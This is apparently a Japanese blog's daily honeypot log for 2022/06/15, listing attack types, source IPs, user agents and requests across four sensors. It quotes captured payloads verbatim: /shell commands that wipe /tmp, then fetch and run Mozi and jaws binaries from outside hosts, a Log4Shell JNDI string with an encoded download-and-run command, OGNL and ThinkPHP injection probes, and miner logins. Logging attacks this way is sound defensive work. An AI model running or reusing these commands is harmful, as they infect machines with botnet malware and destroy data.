2022/06/15 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/06/15分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Laravelへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  cnc.krakenbit.net/jaws;
sh /tmp/jaws

Location:US

D-link製品の脆弱性を狙うアクセス
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://112.27.83.23:40098/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

curlによるスキャン行為
.cssへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為

を確認しました。

Location:SG

aiohttpによるスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://58.253.13.235:51279/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：111 (前日比：-100)
US：総アクセス数：65 (前日比：-122)
UK：総アクセス数：164 (前日比：125)
SG：総アクセス数：92 (前日比：-118)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.149.222	Netherlands
2	5.252.194.39	Russia
18	20.78.0.40	United States
1	27.202.142.236	China
9	35.198.205.123	United States
1	45.142.122.136	Seychelles
6	52.188.13.157	United States
1	62.233.50.179	Russia
16	95.214.235.205	Ukraine
1	96.44.162.70	United States
1	107.130.226.91	United States
2	109.237.103.118	Russia
1	115.220.142.42	China
7	135.125.244.48	France
6	135.125.246.110	France
1	136.144.41.171	Netherlands
7	149.56.234.155	Canada
2	157.245.70.127	United States
1	159.203.77.179	United States
6	161.35.86.181	United States
1	165.227.122.29	United States
4	178.128.111.232	United States
1	180.211.137.57	Bangladesh
1	183.136.225.35	China
2	185.196.220.81	Netherlands
11	193.106.191.95	Russia
1	198.235.24.8	United States

UserAgent一覧

件数	UserAgent
9	`-`
3	`Go-http-client/1.1`
2	`Hello, World`
1	`Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
37	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
9	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`l9explore/1.3.0`
2	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191[.]243[.]196[.]26:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIwMC4xNTAuMTk4LjkyLzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIwMC4xNTAuMTk4LjkyLzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01D\x01`
3		`\x16\x03\x01`
1	CONNECT	`leakix[.]net:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
3	GET	`/.aws/credentials`	HTTP/1.1
2	GET	`/.env.bak`	HTTP/1.1
33	GET	`/.env`	HTTP/1.1
1	GET	`/2018/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/:80:undefined?id=`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/blog/`	HTTP/1.1
1	GET	`/blog/robots.txt`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
2	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
3	GET	`/info.php`	HTTP/1.1
1	GET	`/media/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws`
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PUT	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	2.57.122.80	Romania
1	2.58.149.222	Netherlands
1	20.74.80.211	United States
1	45.142.122.136	Seychelles
1	49.143.32.6	South Korea
9	51.79.29.48	Canada
2	52.165.81.170	United States
6	52.188.13.157	United States
1	62.233.50.179	Russia
1	96.44.162.70	United States
2	107.173.177.147	United States
1	112.27.83.23	China
1	112.65.54.206	China
1	115.56.188.146	China
1	137.184.226.45	United States
4	147.78.47.53	Lebanon
2	157.245.70.127	United States
1	162.142.125.121	United States
1	162.142.125.212	United States
1	164.92.252.11	United States
1	167.172.247.109	United States
2	185.196.220.81	Netherlands
9	185.254.196.223	Ukraine
2	193.56.29.120	United Kingdom
8	193.106.191.95	Russia
1	198.235.24.142	United States
1	205.210.31.145	United States

UserAgent一覧

件数	UserAgent
15	`-`
1	`Hello, World`
1	`Hello, world`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`

リクエスト内容一覧

件数	Method	Request	Protocol
5		`\x03`
1		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
27	GET	`/.env`	HTTP/1.1
1	GET	`/.sendgrid`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/blog/`	HTTP/1.1
1	GET	`/blog/robots.txt`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//112[.]27[.]83[.]23:40098/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wordpress/`	HTTP/1.1
1	GET	`/wp/`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.149.222	Netherlands
1	3.236.144.14	United States
1	4.17.224.131	United States
1	5.181.86.250	Ukraine
1	20.74.80.211	United States
1	31.220.1.83	Germany
1	45.146.165.168	Russia
1	51.142.148.13	United Kingdom
1	104.217.249.182	United States
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	147.78.47.53	Lebanon
2	157.230.216.203	United States
1	167.94.138.63	United States
1	172.104.138.223	United States
128	178.79.148.229	United States
2	185.196.220.81	Netherlands
2	192.64.84.94	United States
1	192.241.212.143	United States
10	193.106.191.95	Russia
1	198.235.24.9	United States
1	198.235.24.34	United States

UserAgent一覧

件数	UserAgent
14	`-`
1	`Java/1.8.0_333`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/509.36 (KHTML, like Gecko) Safari/509.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
126	`curl/7.54.0`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_132.145.66.34_80\n`
1		`SSH-2.0-libssh2_1.9.0`
2		`\x03`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	CONNECT	`api[.]tvup[.]cloud:443`	HTTP/1.1
1	GET	`../../proc/ HTTP`
1	GET	`/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
4	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/CeiK`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/admin.aspx`	HTTP/1.1
1	GET	`/admin.cfm`	HTTP/1.1
1	GET	`/admin.cgi`	HTTP/1.1
1	GET	`/admin.html`	HTTP/1.1
1	GET	`/admin.jhtml`	HTTP/1.1
1	GET	`/admin.jsa`	HTTP/1.1
1	GET	`/admin.jsp`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin.shtml`	HTTP/1.1
1	GET	`/base.asp`	HTTP/1.1
1	GET	`/base.aspx`	HTTP/1.1
1	GET	`/base.cgi`	HTTP/1.1
1	GET	`/base.html`	HTTP/1.1
1	GET	`/base.inc`	HTTP/1.1
1	GET	`/base.jhtml`	HTTP/1.1
1	GET	`/base.jsa`	HTTP/1.1
1	GET	`/base.jsp`	HTTP/1.1
1	GET	`/base.php`	HTTP/1.1
1	GET	`/base.pl`	HTTP/1.1
1	GET	`/base.shtml`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/default.asp`	HTTP/1.1
1	GET	`/default.aspx`	HTTP/1.1
1	GET	`/default.cfm`	HTTP/1.1
1	GET	`/default.cgi`	HTTP/1.1
1	GET	`/default.html`	HTTP/1.1
1	GET	`/default.jhtml`	HTTP/1.1
1	GET	`/default.jsa`	HTTP/1.1
1	GET	`/default.jsp`	HTTP/1.1
1	GET	`/default.php`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/default.shtml`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/home.asp`	HTTP/1.1
1	GET	`/home.aspx`	HTTP/1.1
1	GET	`/home.cfm`	HTTP/1.1
1	GET	`/home.jhtml`	HTTP/1.1
1	GET	`/home.jsa`	HTTP/1.1
1	GET	`/home.jsp`	HTTP/1.1
1	GET	`/home.php`	HTTP/1.1
1	GET	`/home.shtml`	HTTP/1.1
1	GET	`/index.asp`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cgi`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/index.jhtml`	HTTP/1.1
1	GET	`/index.jsa`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/index.pl`	HTTP/1.1
1	GET	`/index.shtml`	HTTP/1.1
1	GET	`/indice.asp`	HTTP/1.1
1	GET	`/indice.aspx`	HTTP/1.1
1	GET	`/indice.cfm`	HTTP/1.1
1	GET	`/indice.cgi`	HTTP/1.1
1	GET	`/indice.jhtml`	HTTP/1.1
1	GET	`/indice.jsa`	HTTP/1.1
1	GET	`/indice.pl`	HTTP/1.1
1	GET	`/indice.shtml`	HTTP/1.1
1	GET	`/inicio.asp`	HTTP/1.1
1	GET	`/inicio.aspx`	HTTP/1.1
1	GET	`/inicio.cfm`	HTTP/1.1
1	GET	`/inicio.cgi`	HTTP/1.1
1	GET	`/inicio.html`	HTTP/1.1
1	GET	`/inicio.jsa`	HTTP/1.1
1	GET	`/inicio.jsp`	HTTP/1.1
1	GET	`/inicio.php`	HTTP/1.1
1	GET	`/inicio.pl`	HTTP/1.1
1	GET	`/inicio.shtml`	HTTP/1.1
1	GET	`/localstart.asp`	HTTP/1.1
1	GET	`/localstart.aspx`	HTTP/1.1
1	GET	`/localstart.cfm`	HTTP/1.1
1	GET	`/localstart.jhtml`	HTTP/1.1
1	GET	`/localstart.jsa`	HTTP/1.1
1	GET	`/localstart.jsp`	HTTP/1.1
1	GET	`/localstart.php`	HTTP/1.1
1	GET	`/localstart.pl`	HTTP/1.1
1	GET	`/localstart.shtml`	HTTP/1.1
1	GET	`/main.asp`	HTTP/1.1
1	GET	`/main.aspx`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/main.cgi`	HTTP/1.1
1	GET	`/main.html`	HTTP/1.1
1	GET	`/main.jhtml`	HTTP/1.1
1	GET	`/main.jsa`	HTTP/1.1
1	GET	`/main.jsp`	HTTP/1.1
1	GET	`/main.php`	HTTP/1.1
1	GET	`/main.pl`	HTTP/1.1
1	GET	`/main.shtml`	HTTP/1.1
1	GET	`/menu.aspx`	HTTP/1.1
1	GET	`/menu.cfm`	HTTP/1.1
1	GET	`/menu.cgi`	HTTP/1.1
1	GET	`/menu.html`	HTTP/1.1
1	GET	`/menu.jhtml`	HTTP/1.1
1	GET	`/menu.jsp`	HTTP/1.1
1	GET	`/menu.php`	HTTP/1.1
1	GET	`/menu.shtml`	HTTP/1.1
1	GET	`/nmaplowercheck1655217232`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/readme.txt`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/start.asp`	HTTP/1.1
1	GET	`/start.aspx`	HTTP/1.1
1	GET	`/start.cfm`	HTTP/1.1
1	GET	`/start.cgi`	HTTP/1.1
1	GET	`/start.jhtml`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/start.php`	HTTP/1.1
1	GET	`/start.pl`	HTTP/1.1
1	GET	`/start.shtml`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.149.222	Netherlands
1	13.89.57.215	United States
1	20.55.53.144	United States
1	31.220.1.83	Germany
3	50.116.16.97	United States
11	51.79.29.48	Canada
6	52.188.13.157	United States
1	52.231.199.112	United States
1	58.253.13.235	China
1	62.233.50.179	Russia
1	65.157.23.94	United States
4	71.6.199.23	United States
1	96.44.162.70	United States
1	104.217.249.182	United States
2	109.237.103.9	Russia
1	121.46.142.244	China
1	123.14.187.232	China
1	143.198.98.147	United States
2	157.230.216.203	United States
1	162.142.125.7	United States
1	162.142.125.213	United States
1	162.142.125.220	United States
1	167.94.146.60	United States
2	185.196.220.81	Netherlands
12	185.213.175.159	Spain
12	185.217.0.13	Isle of Man
8	185.254.196.223	Ukraine
1	188.165.87.96	France
1	192.241.221.241	United States
11	193.106.191.95	Russia

UserAgent一覧

件数	UserAgent
25	`-`
1	`Hello, world`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0`
2	`Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)`
1	`Python/3.7 aiohttp/3.7.4.post0`
3	`\"Mozilla/5.0`
1	`python-requests/2.17.3`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
1		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01\x02`
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"45mqPQST3L63Na77pN3TBGJT5t2kDmfUYRDpEsEWZxfXTBFyDrwQnVAVfCP3NDyPgcdHSxpCtAnFRekGEg7AXejn7mvPbWd\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4856H2VHAPK5HuceVkBAsPQEEXT3Y59bAMCftNLwpHWhFgmb6Yi4fqXSKCzHfPs4e6N6KrRSCLQxEDaZy1dvdrJT99aMQFs\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x67ac954cfca7cc130ec19e03946f27f5b2b019e9\",\"x\"],\"jsonrpc\":\"2.0\"}`
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x6b434a79f3b22f89ba30f9d9db914d2feecf41c6\",\"x\"],\"jsonrpc\":\"2.0\"}`
2		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}
2		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}
1	GET	`../../proc/ HTTP`
23	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/AjCwLauz69kIB1cMYFdynqXQ7vd`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/HWi69nR2Ju_iduN3g_cVUQLEOCO3d031o2UIqyYZwAsrVo8gXo9MAQE08r0R1xysXgOB0oD18-94A1Ah0z60/`	HTTP/1.1
2	GET	`/SiteLoader`	HTTP/1.1
2	GET	`/WuEL`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/a`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/blog/`	HTTP/1.1
1	GET	`/blog/robots.txt`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
2	GET	`/download/file.ext`	HTTP/1.1
2	GET	`/download/popy`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/mPlayer`	HTTP/1.1
